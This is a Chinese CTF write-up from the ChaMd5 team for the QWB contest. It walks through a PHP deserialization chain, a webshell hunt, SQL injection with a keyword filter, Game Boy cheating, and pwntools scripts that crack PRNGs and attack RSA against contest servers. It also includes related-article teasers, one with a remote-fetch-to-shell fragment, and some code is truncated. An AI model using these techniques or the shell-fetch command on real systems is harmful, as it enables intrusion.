QWB WriteUp
2021-02-14 ChaMd5安全團隊upload
tp框架版本編寫的Web應用
該版本的不存在明顯的漏洞
對註冊的各個欄位進行測試
tp框架注入也被過濾了??因該不存在注入漏洞
cookie存在反序列化
修改反序列化為其他圖片路徑,嘗試進行文件讀取,失敗
http://119.3.203.228:32655/upload/
目錄遍歷 
重新掃描發現備份文件www.tar.gz,查看原始碼審計,直接尋找反序列化利用鏈
register的析構函數, 調用profile的__call函數,進而調用profile的upload_img函數
,對已經上傳的圖片進行copy
高明的黑客
提取所有輸入變量,強行賦值。
包含文件,,如果有輸出,則執行成功,即是正確的 shell.
php test.php
then , found 'src/xk0SzyKwfzw.php' in orz.log
隨便注
return preg_match("/select|update|delete|drop|insert|where|\./i", $inject);
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1
鯤or鰻orGame
進入遊戲界面查看元素發現gb文件
利用bgb調試器調試
使用cheat searcher
找到正確的位置並使用FF凍結
運行調試
得到flag
flag{PS03R49UE576R421RE8}
Cryptocopperstudy
解題思路
#! /usr/bin/env python # -*- coding: utf-8 -*-
from pwn import *
from pwnlib.util.iters import bruteforce
from parse import *
import string
from hashlib import sha256
import time
import random
import os
context.log_level="debug"
def s1(p,t):
p.recvuntil('[+]Generating challenge 1\n')
for i in range(200):
t=t+random.randint(-2,2)
random.seed(t)
f=0
for _ in range(i+1):
f=random.randint(0,2**64)
p.sendline(str(f))
fff=p.recvline()
print(i+1,fff)
if '[+]failed' not in fff:
return
def s2(p):
p.recvuntil('[+]Generating challenge 2\n')
for _ in range(200):
p.recvuntil('[-]')
n1=int(p.recvline()[:-1])
p.recvuntil('[-]')
n2=int(p.recvline()[:-1])
print(n1,n2)
r=os.popen('java -jar aa.jar {i} {j}'.format(i=n1,j=n2)).read()
print(r)
p.sendline(r.replace('\n',''))
fff=p.recvline()
if '[+]failed' not in fff:
return
def s3(p):
from randcrack import RandCrack
rc = RandCrack()
p.recvuntil('[+]Generating challenge 3\n')
p.recvuntil('[-]')
for _ in range(624):
p.sendline('1')
print(p.recvuntil('[+]failed:',timeout=1))
n1=int(p.recvline('[-]',timeout=0.5)[:-1])
print(_,n1)
rc.submit(n1)
p.sendline(str(rc.predict_randrange(0, 4294967295)))
fff=p.recvline()
if '[+]failed' not in fff:
return
if len(sys.argv)==1:
conn=process(pwn_file)
pid=conn.pid
else:
conn=remote("119.3.245.36",23456)
sss=''
for i in range(0xff):
sss+=chr(i)
def brute_force(c,s):
return bruteforce(lambda x:sha256(c+x).hexdigest()==s,sss,length=3)
conn.recvline()
#data=conn.recvline(keepends=False)
data=conn.recvline()
s=parse("[+]hashlib.sha256(skr).hexdigest()={}\n",data)[0]
data=conn.recvline()
c=parse("[+]skr[0:5].encode('hex')={}\n",data)[0].decode('hex')
print(c,s)
# s=data[7:11]
conn.sendline((c+brute_force(c,s)).encode('hex'))
conn.recvuntil('[+]teamtoken:')
conn.sendline('cb5c28f9d64b8be2e3d80195')
ggg=int(time.time())
print(ggg)
s1(conn,ggg)
s2(conn)
s3(conn)
conn.interactiv
package com.company; }
import java.util.Random;
public class Main {
// implemented after https://docs.oracle.com/javase/7/docs/api/java/util/Random.html
public static int next(long seed) {
int bits=32;
long seed2 = (seed * 0x5DEECE66DL + 0xBL) & ((1L << 48) - 1);
return (int)(seed2 >>> (48 - bits));
}
public static void main(String[] args) {
long i1 = Long.parseLong(args[0]);
long i2 = Long.parseLong(args[1]);
long seed =0;
for (int i = 0; i < 65536; i++) {
seed = i1 *65536 + i;
if (next(seed) == i2) {
break;
}
}
Random random = new Random((seed ^ 0x5DEECE66DL) & ((1L << 48) - 1));
int o1 = random.nextInt();
int o2 = random.nextInt();
System.out.println(o2);
}
randomstudy
解題思路
第一層:常規coppersmith
第二層:Factoring with High Bits Known
第三層:部分私鑰暴露攻擊https://code.felinae98.cn/ctf/crypto/rsa%E5%A4%A7%E7%A4%BC%E5%8C%85%EF%BC%88%E4%BA%8C%EF%BC%89coppersmith-%E7%9B%B8%E5%85%B3/
第四層:廣播攻擊
第五層:Related Message Attack
第六層:Boneh and Durfee attack
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
from pwnlib.util.iters import bruteforce
from parse import *
from hashlib import sha256
# context.log_level="debug"
ggg=[]
ggg.append('072ee8ffcc3dcf5fdd473fdd592358a9e736b68d3d800976b3030e0a04cc4a33ef05b16e0baea27adfe032cb34f08fe96344a27dc755ee7ccae9d52cdea801db')
ggg.append('474fd237a45154d5c83a41c1ffb7304352ddfd59ee29abeceb76c3d7ee45d80c9ccd33d5fa8bed2c70ebfc8d83e032715dc333daf0d87782f680bc86f3502c7f')
ggg.append('3116bc82757de96d6d85af8b63b297e37d630babf2841ab9fec235e3915268a6d7aca5d9302058f1f00873f17c39894454c8c46e318ed45a13c91b0c2b798546')
ggg.append('159f938209f793ca728fbfe0f4adc0fbbf7ed325c6dd8e21338e9f917aa3549dfdda0f5b0531a9197b0d4b656c649da2dbc8dc6e89cb71c0e2555ffbf04fd2ef')
ggg.append('2a3373b8117231ca9254fd828256ca891ce497370c1e8c48e9362accdb1ffed4e1037096bc2cd58ac33f4c0c47270e3b9f4469025647f1ed92e90b38d02579ae')
ggg.append('6b3bb0cdc72a7f2ce89902e19db0fb2c0514c76874b2ca4113b86e6dc128d44cc859283db4ca8b0b5d9ee35032aec8cc8bb96e8c11547915fc9ef05aa2d72b28')
conn=remote("119.3.245.36",12345)
sss=''
for i in range(0xff):
sss+=chr(i)
def brute_force(c,s):
return bruteforce(lambda x:sha256(c+x).hexdigest()==s,sss,length=3)
conn.recvline()
#data=conn.recvline(keepends=False)
data=conn.recvline()
s=parse("[+]hashlib.sha256(skr).hexdigest()={}\n",data)[0]
data=conn.recvline()
c=parse("[+]skr[0:5].encode('hex')={}\n",data)[0].decode('hex')
print(c,s)
# s=data[7:11]
conn.sendline((c+brute_force(c,s)).encode('hex'))
conn.recvuntil('[+]teamtoken:')
conn.sendline('cb5c28f9d64b8be2e3d80195')
for i in range(len(ggg)):
conn.recvuntil('[+]Generating challenge '+str(i+1))
conn.sendline(ggg[i])
conn.interacti
解題思路
校驗分為兩部分。
第一部分校驗10位元組,校驗手段是代碼數據正確解碼。直接枚舉一個字節即可。代碼如下:
0x10 0x13242298
part1:1324229810
第二部分校驗16位元組,校驗手段是3des加密,ede模式。直接動態,修改下代碼反解。
校驗據:507CA9E68709CEFA20D50DCF90BB976C9090F6B07BA6A4E8
密鑰:AFSAFCEDYCXCXACNDFKDCQXC
解得的輸入:0dcc509a6f75849b
最終flag:13242298100dcc509a6f75849b
webassembly
解題思路
將wasm轉成c再編譯。
主要校驗代碼如下:
xtea加密
輸入38位元組。前32位元組經xxtea加密。38位元組與硬編碼數據校驗。
38位元組校驗數據(hex):959668e7b75517c9ad031ecf6fc5614b0290fd2d22ed0a93307ec9ec8c96b1e065363862627d
前32位元組直接xtea解密即可。
t = '959668e7b75517c9ad031ecf6fc5614b0290fd2d22ed0a93307ec9ec8c96b1e0'
flag = ''
for i in range(4):
ci = xtea.new('\x00'*16)
m = ci.decrypt(t[16*i:16*(i+1)-8].decode('hex')[::-1]+t[16*(i+1)-8:16*(i+1)].decode('hex')[::-1])
flag += m[:4][::-1]+m[4:][::-1]
flag += '65363862627d'.decode('hex')
print flag
最終flag:flag{1c15908d00762edf4a0dd7ebbabe68bb}
設備固件
解題思路
用戶名直接硬編碼校驗,得到:2cbca
密碼校驗通過vm進行。
vm指令如下:
直接反解:
得到密碼:134bb097e43b292f4431b6cd8db194db
最終flag:flag:flag{2cbca134bb097e43b292f4431b6cd8db194db}
小哥哥談戀愛嗎
兩百斤的那種哦
招新小廣告
ChaMd5 ctf組 長期招新
尤其是crypto+reverse+pwn+合約的大佬
歡迎聯繫admin@chamd5.org
相關焦點
-
linux-kernel-pwn qwb2018 core
分析$ checksec core.ko[*] '/home/raycp/work/kernel/qwb2018-core/cpio/core.ko'Arch: amd64-64-little RELRO: No RELROStack: Canary found NX: NX enabled PIE -
2019強網杯WriteUp(下)
/qwb_crack", target, prefix], stdout=PIPE).stdout.read().strip()sh.sendline(skr)sh.sendline(token)sh.recvuntil("librandomstudy")print sh.recvuntil("[-]")time_base = int(time.time())for i in xrange(30): -
2019高校運維賽writeup
(str(c))f.write("\n")f.write(str(n))p和q都是400位的數,p和q前後200相反可以設p=a*pow(10,200)+b q=b*pow(10,200)+a所以n=a -
SUCTF-WriteUp(下)
00000000000000B8 call printk ; PIC mode.text.unlikely:00000000000000BD.text.unlikely:00000000000000BD loc_BD: 堆溢出.text:0000000000000000 sudrv_write -
英語閱讀:Write Your Own Life
Instead of picking up and using the pen, you could leave it on a shelf or in a drawer where it will dry up, unused. But if you do decide to use it, what would you do with it? -
寫日記說成「write a diary」,真的是太chinglish
今天我們就來介紹兩組~01寫日記 ≠ write a diary寫日記✘write a diary✔keep a diarySaying &34; implies that the person is writing a book, or a work of fiction, not a personal -
RCTF 2020 Writeup
pop_rsi_ret=0x0000000000023e6a+libc_base pop_rdx_ret=0x0000000000001b96+libc_base open_addr=libc_base+libc.symbols["open"] read_addr=libc_base+libc.symbols["read"] puts_addr=libc_base+libc.symbols["write -
The First Draft:Beginning to Write
Writing essays for your "back-up" schools will help you to think about and revise the essay for your first-choice school. -
2020 *ctf 部分pwn writeup
TARGET_NR_readlinkat:+ case TARGET_NR_faccessat:+ case TARGET_NR_openat2:+ case TARGET_NR_openat:+ case TARGET_NR_read:+ case TARGET_NR_readv:+ case TARGET_NR_write -
英語美文欣賞:Write Your Own Life
Instead of picking up and using the pen, you could leave it on a shelf or in a drawer where it will dry up, unused. But if you do decide to use it, what would you do with it? -
SCTF Writeup By W&M
}api.chara.pub:1234/shell|sh"); byte[] byt2 = myencrypt(obj); System.out.println(Arrays.toString(byt2)); FileOutputStream fos = new FileOutputStream("payloadg.class"); fos.write -
RCTF2020 部分Writeup
libc.address + 0x0000000000023e6apop_rdx = libc.address + 0x0000000000001b96leave = libc.address + 0x0000000000054803pop_rsp = libc.address + 0x0000000000003960open = libc.sym['open']read = libc.sym['read']write -
GACTF Writeup By星盟安全團隊
可以利用large bin attack攻擊IO_FILE的flags,然後unsorted bin attack攻擊IO_FILE的IO_write_base,這樣就能洩露出數據,至於為什麼不直接用large bin attack來一次性攻擊IO_FILE的flags和IO_write_base,是因為large bin的bk_nextsize處不是libc指針,因此還得通過一系列複雜的方法使其留下 -
安洵杯2020 官方Writeup(Pwn)
程序開了沙箱, 只能採用open, read, write來列印flag或者利用lgx::http::send_file函數來獲取flag。, 1, flag_addr, 0, 0, elf.got['open'], gadget_call, 0, 0, 1, 3, flag_addr, 0x100, elf.got['read'], gadget_call, 0, 0, 1, 1, flag_addr, 0x100, elf.got['write -
雙語:Write Your Own Life (譜寫生命的樂章)
Instead of picking up and using the pen, you could leave it on a shelf or in a drawer where it will dry up, unused. 事實上,這個遊戲裡沒有規則指定你必須要做什么。相反,你甚至可以根本不去動用這支筆,把它扔在書架上或是抽屜裡讓它的墨水乾枯。 -
0RAYS-祥雲杯writeup
import structimport binasciifrom xixi import FAT32Parserfat=FAT32Parser("new.vhd")f = open("new.vhd", "rb")f.seek(0x27bae00) #定位圖片flag = open("flag.png", "wb")flag.write -
NSCTF "SteinsGate"詳細writeup
】NSCTF "SteinsGate"詳細writeupFrom ChaMd5安全團隊核心成員 sherlly -
「寫日記」英語千萬別直譯成「write a diary」,太中國式了
01、寫日記 ≠ write a diary錯誤:write a diary正確:keep a diarySaying "write a diary" implies that the person is writing a book, or a work of fiction, not a personal day-by-day memoir -
「壞鄰居」漏洞 CVE-2020-16898 的 Writeup
我能找到的唯一的額外信息是根據檢測邏輯編寫的 write-up。命運就是如此神奇:關於如何防範攻擊的信息竟然有助於編寫 exploit 的 writeup:最重要的信息如下:「雖然忽略所有非 RDNSS 的 Options,但對於 Option Type = 25 (RDNSS),我們會檢查 Lengption (Option 中的第二個字節)是否為偶數。 -
SCTF2020 官方Write-up
參數就是 '/index.php' 然後是劫持,我們無法輸入任何括號和空格,所以無法直接import werkzeug 需要通過一個繼承鏈關係來找到werkzeug這個類 直接拿出tokyowestern 2018年 shrine的找繼承鏈腳本(https://eviloh.github.io/2018/09/03/TokyoWesterns-2018-shrine-writeup